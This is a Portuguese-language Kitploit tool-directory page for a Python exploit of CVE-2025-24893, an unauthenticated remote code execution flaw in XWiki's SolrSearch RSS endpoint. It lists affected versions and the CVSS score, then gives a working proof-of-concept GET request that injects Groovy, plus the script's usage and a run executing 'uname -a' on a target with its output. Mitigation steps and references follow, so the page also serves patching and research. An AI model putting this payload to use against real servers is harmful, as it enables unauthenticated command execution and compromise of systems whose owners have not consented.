Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893 — Exploit em Python para CVE-2025-24893, uma RCE crítica não autenticada na Plataforma XWiki, permitindo execução arbitrária de código Groovy por meio de solicitação RSS manipulada para o endpoint SolrSearch. | Kitploit
Ferramentas/GitHubGitHub/b0ysie7e/cve-2025-24893
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Exploit em Python para CVE-2025-24893, uma RCE crítica não autenticada na Plataforma XWiki, permitindo execução arbitrária de código Groovy por meio de solicitação RSS manipulada para o endpoint SolrSearch.

Ver Repositório
113há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit para CVE-2025-24893

CVE-2025-24893 é uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada que afeta a Plataforma XWiki.
Esta falha permite que qualquer usuário convidado injete e execute código Groovy arbitrário—sem autenticação—através de uma solicitação RSS especialmente criada para o endpoint SolrSearch.

Isso impacta diretamente a confidencialidade, integridade e disponibilidade do sistema afetado.

Resumo

  • Versões Afetadas:
    • XWiki ≥ 5.3-milestone-2 até < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 até < 16.4.1
  • Pontuação CVSS v3.1: 9.8 (Crítica)
    Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Explorabilidade: Muito fácil — uma única solicitação HTTP GET é suficiente.

⚠️ Aviso Legal:

Este código é estritamente destinado a fins educacionais e de pesquisa. O uso não autorizado em sistemas sem permissão explícita pode constituir violação da lei. O autor não se responsabiliza por qualquer uso indevido ou atividade maliciosa envolvendo esta ferramenta.

Prova de Conceito (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Manual de Uso do Script de Exploit

Esta seção explica como configurar e executar o script de exploit em Python para aproveitar a CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Mitigação

Atualizar para versões corrigidas:

Para corrigir a vulnerabilidade, atualize o XWiki para uma das seguintes versões:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Solução Alternativa Temporária:

Se uma atualização não for possível imediatamente, você pode aplicar uma correção temporária:

  1. Edite o arquivo SolrSearchMacros.xml (localizado em Main.SolrSearchMacros) por volta da linha 955.
  2. Substitua a lógica de saída para usar a macro rawResponse com o tipo de conteúdo definido como application/xml.
    Use a implementação encontrada em macros.vm na linha 2824 como referência.

Referências:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
Baixar ferramenta